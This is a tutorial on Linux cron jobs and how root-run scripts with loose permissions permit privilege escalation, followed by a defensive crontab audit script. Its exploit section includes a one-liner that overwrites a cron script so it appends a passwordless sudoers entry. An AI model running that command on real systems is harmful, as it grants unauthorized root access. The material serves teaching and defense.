Misconfigured Cron Jobs

Linux uses a tool called Cron to schedule and automate tasks. Cron is a time-based service that runs programs, scripts, or commands at set intervals. These scheduled tasks are called cron jobs.

Cron is useful for automating tasks like system backups, software updates, and maintenance. The crontab file is a special configuration file that stores and manages scheduled cron jobs.

# example of a cron job that runs a backup script every day at 2 AM
0 2 * * * /home/user/backup.sh

# to edit cron jobs
crontab -e

# to view scheduled jobs
crontab -l

Exploiting

Cron jobs can be set up to run as any user on the system, which is an important detail to watch for. Our main focus will be on cron jobs running as the root user, because any script or command executed by these jobs will run with root privileges.

To escalate privileges, we need to:

  1. Identify cron jobs scheduled by root

  2. Find files or scripts being executed by those jobs

If we can modify these files or scripts, we may gain root access when the cron job runs.

crontab -l # lists the cron jobs of the current user only

# Search recursively (-r) under /usr for files that reference "/home/[USER]/message"
# ([USER] is a placeholder for the account name).
# -n prints the line number of each match; -w matches only whole words.
grep -rnw /usr -e "/home/[USER]/message"

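# Suppose copy.sh is run by a cron job and contains, for example:
cp [FROM] [TO]
chmod 644 [TO]

# check the owner and permissions of the script
ls -al copy.sh
# if the script is writable, overwrite it so that the next cron run appends a sudoers entry for the user "student"
printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh

# after the cron job has run, list the sudo rights of the current user
sudo -l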
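
From the defender's side, the same two steps (list the cron jobs, then check who can modify what they run) can be automated. The script below is an added example, not part of the original page: it assumes crontab text in the per-user format shown above saved to a file, and the function names and sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): audit a crontab for scripts
# that users other than the owner can modify. Function names are hypothetical.

# Succeeds if the path is group- or world-writable (symlinks are followed).
is_loosely_writable() {
    perms=$(ls -ldL "$1" 2>/dev/null | cut -c1-10)
    case "$perms" in
        ?????w*|????????w*) return 0 ;;   # 6th char = group w, 9th = other w
    esac
    return 1
}

# Reads crontab text (five time fields, then the command) and prints
# "FILE <path>" when a referenced regular file is loosely writable and
# "DIR <path>" when its parent directory is, since a writable directory
# lets the file be replaced. @reboot-style lines are not handled.
audit_crontab() {
    # Drop comments, blank lines and VAR=value lines.
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=)' "$1" |
    # Keep every absolute path that appears in the command part.
    awk '{ for (i = 6; i <= NF; i++) if ($i ~ /^\//) print $i }' |
    sort -u |
    while IFS= read -r target; do
        [ -f "$target" ] || continue
        if is_loosely_writable "$target"; then
            echo "FILE $target"
        fi
        if is_loosely_writable "$(dirname "$target")"; then
            echo "DIR $(dirname "$target")"
        fi
    done
}

# Constructed sample: copy.sh is world-writable, backup.sh is not.
demo() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\n' > "$d/copy.sh";   chmod 0777 "$d/copy.sh"
    printf '#!/bin/sh\n' > "$d/backup.sh"; chmod 0755 "$d/backup.sh"
    printf '# constructed crontab\n0 2 * * * %s\n*/5 * * * * %s >/dev/null\n' \
        "$d/backup.sh" "$d/copy.sh" > "$d/crontab"
    audit_crontab "$d/crontab"
    rm -rf "$d"
}
demo
```

To audit a real system, run `audit_crontab` as root against a saved copy of root's crontab; any line it prints is a script or directory whose permissions should be tightened to root-only write access.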
